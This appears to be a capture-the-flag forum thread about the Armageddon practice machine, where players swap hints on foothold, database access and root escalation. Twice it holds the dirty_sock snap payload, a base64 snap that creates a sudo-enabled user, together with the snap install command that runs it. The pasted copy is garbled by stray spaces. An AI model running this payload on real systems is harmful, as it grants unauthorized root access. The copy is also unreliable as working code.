Official Armageddon Discussion

Type your comment> @0xbro said:

Do someone built the privilege escalation exploit from scratch following GTFObins on a Kali machine? Can I have a help?
I exploited the box some time ago with a “vanilla” process from GTFObins but now the same process does not work anymore -.-

There was a suggestion earlier in this thread to build it in an Ubuntu VM as opposed to trying to get it to work with Kali.

This was a great box! Solid, real-life-scenario steps from foothold to user to root.

@routetehpacket said:
Type your comment> @0xbro said:

Do someone built the privilege escalation exploit from scratch following GTFObins on a Kali machine? Can I have a help?
I exploited the box some time ago with a “vanilla” process from GTFObins but now the same process does not work anymore -.-

There was a suggestion earlier in this thread to build it in an Ubuntu VM as opposed to trying to get it to work with Kali.

This was a great box! Solid, real-life-scenario steps from foothold to user to root.

Yeah I read it but I do not get why this time it did not work to me, while the first time did… probably a Kali update?

Type your comment

@letourneaualex said:
I thought I saw a way to root the box on GTFObins using fpm to simplify the crafting process but I get an error "error: cannot perform the following tasks:…’ , should it work or I really have craft the whole thing from scratch?

Once I installed fpm on kali, it worked for me following the instructions as described.

Root: Try not to focus on exploitation as much as leveraging existing privileges granted to the user. GTFO and live off the land! Works for building on kali, no special environment required.

Very good box, learned quite allot and really gets you using quite a few tools.

DM if you need a push

hey
i try to connect to db of the machine with mysql and every syntax i try he say to me ‘‘error 1045 access denied’’
my someone have seclusion?

Hi, I have managed to get a foothold on the system and using some internal knowledge I know where I need to go next. I have the username but for the life of me I cannot find the password. Could anyone give me some pointers?

Type your comment> @bbgavish said:

hey
i try to connect to db of the machine with mysql and every syntax i try he say to me ‘‘error 1045 access denied’’
my someone have seclusion?

Im having the same problem did you find a solution?

Type your comment> @bbgavish said:

hey
i try to connect to db of the machine with mysql and every syntax i try he say to me ‘‘error 1045 access denied’’
my someone have seclusion?

@bbgavish @dewdrop0247 try using all the information you have in the command line guys

Hello everyone, I am trying to get the system flag but it is impossible, I can’t create the user dirty_sock , I have used these 2 instructions:

python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD xICAAAAAAAAsAIAAAAAAAA ////////// + AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA + PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J / e5 + + lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET qumvhFkbY5Pr4ba1mk4 / XVLOZmGVXmojv / IHq2fZcc / VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA / Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGm IBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc + MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw “+” A “* 4256 +” == " '| base64 -d> exploit.snap

and then:

sudo / usr / bin / snap install --devmode exploit.snap

Then I check / etc / passwd but there is no dirty_sock user …

Could someone help me please?

@administrator please?

got foothold and am user a****e, any nudge on how to find flag?

update: got db creds, getting access denied for user ‘d**u@localhost’. Any help getting access to db would be GREATLY appreciated

Type your comment> @administrator said:

Root: Try not to focus on exploitation as much as leveraging existing privileges granted to the user. GTFO and live off the land! Works for building on kali, no special environment required.

Thanks a lot for this nudge… this should be pinned all the way to the first page… all other info are like smoke bombs everywhere… but gtfo site + “correct attack path” = root.

I managed to find the password and a hash of somesort. Can someone ping me as to how to crack it? I know of some tools but need some help. Thanks

Type your comment> @dani8388 said:

Hello everyone, I am trying to get the system flag but it is impossible, I can’t create the user dirty_sock , I have used these 2 instructions:

python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD xICAAAAAAAAsAIAAAAAAAA ////////// + AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA + PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J / e5 + + lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET qumvhFkbY5Pr4ba1mk4 / XVLOZmGVXmojv / IHq2fZcc / VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA / Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGm IBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc + MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw “+” A “* 4256 +” == " '| base64 -d> exploit.snap

and then:

sudo / usr / bin / snap install --devmode exploit.snap

Then I check / etc / passwd but there is no dirty_sock user …

Could someone help me please?

@administrator please?

Can someone help me please?

Thanks in advance

Type your comment> @x00future said:

Could someone DM me a nudge? have basic shell with a****. found default m**** creds but they are not working. Want to run what I am doing past someone who has rooted to see if i am on correct track or not.

same issue here

Stuck in shell as a*****, found some m**** creds and db, however unable to connect from shell to dig further. I know what I want to do after, but just not able to connect to the service I want. Do I need to try harder or am I missing something?

First box here. Sorry if I’m not cryptic enough and this would be a spoiler, if so please report and take my comment off air :).

Every time I run a code to try and work towards root it tells me that there is a syntax error. Not sure what the problem is when I copied it correctly. Anyone able to help me out?

Type your comment> @CyberB0y said:

Every time I run a code to try and work towards root it tells me that there is a syntax error. Not sure what the problem is when I copied it correctly. Anyone able to help me out?

depressed. I’m pretty sure I have the same problem as you…

> @ryan0n said: > Got user, working on root. Root seems fairly straight forward, will just require research and prep in a piece of software I haven’t ever had to learn about. > > If you are staging/debugging your s***, and are in a kali/etc vm, you’ll need to enable nested kvm features for your vm. For instance in Virtualbox, you’ll go to the VM’s settings -> System -> Processor -> and tick the box for “enable nested vt-x/amd-v”. > > EDIT: rooted :slight_smile: I don’t have any boxes in my processor settings. Supposedly windows 10 doesn’t allow nested virtualization? Anyone solve this one without s***? https://communities.vmware.com/t5/VMware-Workstation-Pro/Nested-virtualization-on-Workstation-14-PRO-on-AMD-Ryzen/m-p/475023#M24618